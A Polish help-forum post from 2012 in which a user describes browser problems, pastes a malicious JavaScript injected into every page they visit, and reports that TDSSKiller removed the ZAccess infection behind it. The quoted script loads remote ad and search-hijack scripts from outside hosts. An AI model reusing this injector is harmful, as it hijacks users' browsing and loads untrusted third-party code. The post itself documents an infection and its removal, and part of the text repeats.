04.12.2012, 13:43
Witam, Dziś zaciekawiła mnie dziwna sytuacja - otóż nie byłem i nie jestem nadal w stanie na żadnej z przeglądarek zalogować się na gmaila - wyskakuje kompunikat, że mam wyłączone pliki coockies mimo, że są włączone.. Czyściłem, przeinstalowywałem przeglądarki - to samo nadal. Na chromie do tego facebook przestał działać bo ma problemy z certyfikatem. Przypadkowo wszedłem w źródło jednej strony i znalazłem tam taki skrypt na dole:
Co się okazało? Ten skrypt doczepiony jest na każdej stronie w którą wejdę. Nawet jeśli to jest pusta strona.
Syf jakiś, który nie wiem gdzie się zakorzenił..
Robię właśnie skan otlem (coś się przywiesił ale mam nadzieje, że dokończy działanie) jak tylko będę miał logi - to podeślę, a w międzyczasie pytam kogokolwiek czy ktoś miał już z tym styczność ? Czy to jakaś świeżynka bo i na google bardzo mało o tym jest.. Tzn nic praktycznie.
LOGI JUŻ SĄ!
Dodano: 04 gru 2012, 13:43
Dla potomnych jakby ktoś załapał tego wirusika. Pomógł program TDSSKiller znajdująć i lecząc wirusa ''Virus.Win32.ZAccess.aml''. Po tym zabiegu wszystko jest ok, skrypt nie jest doczepiany, strony działają wszystkie poprawnie.
Kod:
<script>
var id=2808851251;
var aff=30324;
var sid=0;
function INCL_isIFramed()
{
return (top !== self);
}
function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search\.kalloutsearch\d\.com/i.test(h) == true ||
/search\.adbar\d\.com/i.test(h) == true ||
h.indexOf(''search.runclips.com'') != -1 ||
h.indexOf(''search.searchnowdirect.com'') != -1);
}
function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src)
{
if (window.location.protocol == ''https:'' && src.indexOf(''http:'') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
(document.head||document.documentElement).appendChild(script);
}
if (!INCL_isIFramed() && !INCL_checkinternals())
{
if (!INCL_checkdml()) {
var INLDM_cfg = { fi : 4603, fd : 0,
fddm: ''xml.cpchero.biz'',
sttcdm: ''static.cpchero.biz'',
inlsrhdm: ''sonicsearchonline.biz'' };
INCL_loadScript(''https://hostmyjs.biz/scripts/inl_dmmtch2.min.js'');
INCL_loadScript(''https://in.admedia.com/?id=ODkoOCI&subid=36'');
}
INCL_loadScript(''http://i.websuggestorjs.info/sugg/javascript.js?channel=js36'');
INCL_loadScript(''https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222'');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd :
4723, fd2: 4604, xmlfeed : ''http://xml.cpchero.biz/search'' , search_url
:
''http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=''
, script_base : ''https://hostmyjs.biz/scripts/adbar'' };
INCL_loadScript(''https://hostmyjs.biz/scripts/adbar/adbar.js'');
}
</script>Co się okazało? Ten skrypt doczepiony jest na każdej stronie w którą wejdę. Nawet jeśli to jest pusta strona.
Syf jakiś, który nie wiem gdzie się zakorzenił..
Robię właśnie skan otlem (coś się przywiesił ale mam nadzieje, że dokończy działanie) jak tylko będę miał logi - to podeślę, a w międzyczasie pytam kogokolwiek czy ktoś miał już z tym styczność ? Czy to jakaś świeżynka bo i na google bardzo mało o tym jest.. Tzn nic praktycznie.
LOGI JUŻ SĄ!
[Aby zobaczyć linki, zarejestruj się tutaj]
[Aby zobaczyć linki, zarejestruj się tutaj]
Dodano: 04 gru 2012, 13:43
Dla potomnych jakby ktoś załapał tego wirusika. Pomógł program TDSSKiller znajdująć i lecząc wirusa ''Virus.Win32.ZAccess.aml''. Po tym zabiegu wszystko jest ok, skrypt nie jest doczepiany, strony działają wszystkie poprawnie.
